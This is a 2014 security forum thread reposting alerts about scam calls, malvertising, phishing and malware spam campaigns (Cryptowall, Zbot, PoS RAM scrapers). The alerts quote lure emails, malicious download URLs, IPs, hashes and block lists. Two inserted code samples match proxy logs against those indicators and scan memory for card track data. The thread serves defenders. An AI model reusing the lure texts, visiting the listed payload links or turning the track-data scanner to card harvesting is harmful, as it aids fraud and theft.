Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___
Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerworld.com/article/2604303/malicious-advertising-hits-amazon-youtube-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims... Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.com/security/kyle-and-stan/
:fear: :mad:
AplusWebMaster
2014-09-11, 14:55
FYI...
Fake job offer SPAM - llcinc .net
- http://blog.dynamoo.com/2014/09/llc-inc-llcincnet-fake-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
Date: Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
From: LLC INC
Reply-To: recruiter@ llcinc .net
Subject: EMPLOYMENT OFFER
Hello,
Good day to you overthere we will like to inform you that our company is currently
opening an opportunity for employment if you are interested please do reply with your resume
to recruiter@ llcinc .net
Thanks
Management LLC INC
This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___
Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From: eFax [message@ inbound .efax .com]
Date: 11 September 2014 20:35
Subject: eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...
... the link in the message goes somewhere bad, in this case it downloads a ZIP file from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according to the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustotal.com/en-gb/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410467960/
** http://www.dynamoo.com/files/analysis_2567_79b1f47c0dfd99f974d2920a381ad91f.pdf
*** https://www.virustotal.com/en-gb/file/5db8207e1891b01b84c987f8065c2f646cbcceae9ff5af5198a05f75766e8c39/analysis/1410468901/
___
Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
11 Sep 2014 - "There is currently some sort of injection attack against WordPress sites that is injecting code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "
176.58.100.98: https://www.virustotal.com/en-gb/ip-address/176.58.100.98/information/
178.62.254.78: https://www.virustotal.com/en-gb/ip-address/178.62.254.78/information/
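Both the eFax/Cryptowall post and the WordPress-injection post above end with a short block list. The script below is an added example (not code from dynamoo or from this thread) showing the detection side of that advice: it runs a constructed Squid-style proxy log against the IPs and domains quoted in those two posts and reports which internal clients touched them. The log lines, client addresses and the log layout are assumptions; `refang()` is included because the posts print the domains with a space before the TLD.

```python
"""Match proxy log lines against the block lists quoted in the two dynamoo posts above.

Added example, not dynamoo's code. The indicators come from the posts; the log
lines, internal client addresses and Squid-style layout are constructed.
"""
import ipaddress
import re

# Indicators as listed in the posts (the posts write domains defanged, e.g. 'goodbookideas .com').
BLOCKLIST_IPS = {
    "188.165.204.210", "193.19.184.20", "193.169.86.151",   # eFax / Cryptowall post
    "176.58.100.98", "178.62.254.78",                       # WordPress injection post
}
BLOCKLIST_DOMAINS = {"goodbookideas.com", "mtsvp.com", "suspendedwar.com"}

# Squid native access-log layout (assumed): time elapsed client action/code size method url ...
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+(?P<client>\S+)\s+\S+\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)

# Constructed sample log; the clients and requests are not from the posts.
SAMPLE_LOG = """\
1410428000.123    120 10.0.0.15 TCP_MISS/200 5120 GET http://goodbookideas.com/ - DIRECT/192.0.2.10 text/html
1410428001.456     80 10.0.0.15 TCP_MISS/200 310 POST http://193.19.184.20/ - DIRECT/193.19.184.20 text/html
1410428002.789     40 10.0.0.22 TCP_HIT/200 2048 GET http://www.example.org/index.html - NONE/- text/html
1410428003.001     55 10.0.0.31 TCP_MISS/200 900 GET http://cdn.suspendedwar.com/x - DIRECT/192.0.2.11 text/html
1410428004.222     30 10.0.0.40 TCP_MISS/200 700 GET https://178.62.254.78:443/ - DIRECT/178.62.254.78 text/html
"""


def refang(indicator):
    """Normalise a defanged indicator ('goodbookideas .com', 'example[.]com') to a plain hostname."""
    return indicator.replace(" .", ".").replace("[.]", ".").strip().lower()


def host_of(url):
    """Extract the host part of a URL, with scheme, port and path stripped."""
    m = re.match(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:?#]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def matches_blocklist(host):
    """Return (indicator, kind) with kind 'ip' or 'domain' if host is blocked, else None."""
    try:
        ip = str(ipaddress.ip_address(host))
    except ValueError:
        ip = None
    if ip is not None:
        return (ip, "ip") if ip in BLOCKLIST_IPS else None
    host = host.rstrip(".")
    for d in BLOCKLIST_DOMAINS:
        if host == d or host.endswith("." + d):   # subdomains of a blocked domain count too
            return (d, "domain")
    return None


def find_hits(lines):
    """Return (client, host, indicator, kind) for every log line that reached a blocked indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host = host_of(m.group("url"))
        hit = matches_blocklist(host)
        if hit:
            hits.append((m.group("client"), host, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for client, host, indicator, kind in find_hits(SAMPLE_LOG.splitlines()):
        print(f"{client} -> {host} (blocked {kind}: {indicator})")
```

Each hit names an internal client that contacted a listed indicator, which is the list of machines to pull for a Cryptowall check; matching subdomains as well as exact domains matters here because the WordPress post notes the payload hosts are hijacked subdomains that change every half hour.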
___
Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecurity.co.uk/employees-important-address-update-fake-pdf-malware/
11 Sep 2014 - "'To All Employee’s – Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
To All Employee’s:
The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...
11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustotal.com/en/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410456657/
- http://blog.dynamoo.com/2014/09/to-all-employees-important-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From: Administrator [administrator@ victimdomain .com]
Date: 11 September 2014 22:25
Subject: To All Employee's - Important Address UPDATE
To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...
The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
___
Fake picture or video SPAM – jpg malware
- http://myonlinesecurity.co.uk/new-picture-video-message-fake-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif. Even setting show file extensions will not show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
You have received a picture message from mobile phone number +447586595142 picture
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service
There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service
... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*
11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to: IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410430034/
** https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
___
Fake 'new order' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-order-fake-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/new-order.png
11 September 2014: 2014.09.11.zip : Extracts to: 2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
:mad::mad: :fear:
AplusWebMaster
2014-09-12, 12:08
FYI...
Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu/2014/09/12/fake-email-copie-facture-societe-lws-fc-contains-malicvious-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...
The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. The VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/adf506eebd74dbdd2e23ab2a0918912a95105745226302cca32c760c34d196a5/analysis/
___
Fake Household Improvement SPAM - Zbot Malware
- https://blog.malwarebytes.org/fraud-scam/2014/09/household-improvement-emails-come-with-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/09/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot. Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the Virus Total scores currently clock in at 29/54**... there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecurity.co.uk/m-m-kitchen-appliances-inv211457-fake-word-doc-malware/
** https://www.virustotal.com/en/file/941434a32431048380956c6bb7c6be5fd4105ac397eb8c46011d27e827014f73/analysis/
*** http://blog.mxlab.eu/2014/09/12/fake-email-with-attached-invoice-from-broad-oak-toiletries-ltd-contains-trojan/
___
Data Breaches and PoS RAM Scrapers
- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-an-explosion-of-data-breaches-and-pos-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream of merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and have open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July, is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and install Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
:mad: :fear:
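The Trend Micro write-up quoted above describes scrapers that search process memory for Track 1 and Track 2 data. The following added example is mine, not Trend Micro's or the forum poster's; it shows the same pattern matching from the defender's side: scan a memory dump or log buffer for track-formatted records, apply the Luhn mod-10 check so that random digit runs are discarded, and report only masked PANs. The buffer, cardholder name and card numbers are constructed (the public industry test numbers 4111 1111 1111 1111 and 5555 5555 5555 4444, plus a Luhn-failing decoy); nothing here comes from any breach.

```python
import re
from typing import Dict, List

# Track 1, format B: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})([^?]{0,40})\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})([^?]{0,20})\?")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check that separates real PANs from digit runs that merely fit the pattern."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        digit = int(ch)
        if i % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the BIN and last four so a finding is useful without copying the full PAN."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_buffer(buf: bytes) -> List[Dict]:
    """Find Luhn-valid Track 1/2 records in a memory or log buffer, ordered by offset."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            yymm = m.group(3).decode()
            hits.append({"track": 1, "offset": m.start(), "pan": mask_pan(pan),
                         "name": m.group(2).decode(errors="replace"),
                         "expiry": f"{yymm[2:]}/{yymm[:2]}",
                         "service_code": m.group(4).decode()})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            yymm = m.group(2).decode()
            hits.append({"track": 2, "offset": m.start(), "pan": mask_pan(pan),
                         "expiry": f"{yymm[2:]}/{yymm[:2]}",
                         "service_code": m.group(3).decode()})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed buffer standing in for a process memory dump. The card numbers are the
# public industry test numbers; the Luhn-failing decoy exercises the filter.
SAMPLE_MEMORY = (
    b"\x00\x10\x7f\xff" + b"POS_APP v3.1 session 42 " +
    b"%B4111111111111111^DOE/JOHN^2512101123456?" +
    b"\x00" * 8 +
    b";5555555555554444=2603201987654321?" +
    b" ok\r\n" +
    b";4111111111111112=2512101?" +  # fails Luhn: pattern noise, not a card
    b"\xde\xad\xbe\xef"
)

if __name__ == "__main__":
    for hit in scan_buffer(SAMPLE_MEMORY):
        print(hit)
```

Run it over a `procdump` image of a suspicious process or over application logs; a hit in memory belonging to anything other than the payment application itself is exactly the signal a RAM scraper leaves. The Luhn filter matters in practice: without it, timestamps and transaction IDs produce a steady stream of false positives.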
AplusWebMaster
2014-09-15, 03:44
FYI...
Phish - Paypal ...
- http://myonlinesecurity.co.uk/paypal-account-will-limited-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever follow the links in the email...
PayPal account information :
Hello,
Dear PayPal user ,
Your account will be limited if you not confirm it .
Need Assistance?
Some information on your account appears to be missing or incorrect.
Please update your account promptly so that you can continue to enjoy
all the benefits of your PayPal account.
If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
Please Login to confirm your information :
http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
Reference Number: PP-003-211-347-423
Yours sincerely,
PayPal
This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rangeview_paypal_phishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
:fear: :mad:
AplusWebMaster
2014-09-15, 13:13
FYI...
Fake Termination SPAM – malware
- http://myonlinesecurity.co.uk/termination-due-policy-violation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SHA1 or MD5 #. Loads of slightly different subjects with this one, including
Policy violation #59892665326
Termination due to policy violation #33205939124
Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
Hello,
We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
- 0A4 44 12.09.2011
- 0A4 46 12.09.2011
- 0A4 85 12.09.2011
You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
Sincerely,
Pauletta Stephens ...
15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to: disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/eb62d2fc255b934706b15eb5fa4f07fdf3a900810820ef60db62b77de1d4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustotal.com/en/ip-address/187.45.193.139/information/
213.186.33.87: https://www.virustotal.com/en/ip-address/213.186.33.87/information/
23.62.99.33: https://www.virustotal.com/en/ip-address/23.62.99.33/information/
66.96.147.117: https://www.virustotal.com/en/ip-address/66.96.147.117/information/
UDP communications:
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
LinkedIn feature exposes Email Addresses
- http://krebsonsecurity.com/2014/09/linkedin-feature-exposes-email-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___
Fake Overdue invoice SPAM - malicious .arj attachment
- http://blog.dynamoo.com/2014/09/overdue-invoice-6767390-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
From: Mauro Reddin
Date: 15 September 2014 10:32
Subject: Overdue invoice #6767390
Morning,
I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
Best regards,
Mauro Reddin ...
The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustotal.com/en-gb/file/c21b719a9cf4c5aa9d8927c185be4181d7c465b01fa85e38c7a3d459930e2203/analysis/1410773681/
___
Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:
Screenshot: http://4.bp.blogspot.com/-knPfcbJT0Q4/VBbJyysrTNI/AAAAAAAAFnI/YbEjR56dgRU/s1600/sage.png
... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com"
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
___
Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-natwest-fake-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...
15 September 2014: SecureMessage.zip ( 8kb) : Extracts to: SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
- http://threattrack.tumblr.com/post/97567721558/natwest-secure-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/65aed37f33dcaf8e16e0b2e828d4f53e/tumblr_inline_nby6ovZu2c1r6pupn.png
___
Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecurity.co.uk/lloyds-bank-new-secure-message-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]
(New users may need to verify their email address)
If you do not see or cannot click “Read Message” / click here
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/lloyds_bank_secure_message.png
This one wants your personal details and bank details..."
___
Fake Fax SPAM - malware attachment
- http://myonlinesecurity.co.uk/received-fax-fake-pdf-malware/
15 SEP 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a new fax. This fax was received by Fax Server.
The fax has been downloaded to dropbox service (Google Inc).
To view your fax message, please download from the link below. It’s
operated by Dropbox and safety...
Received Fax Details
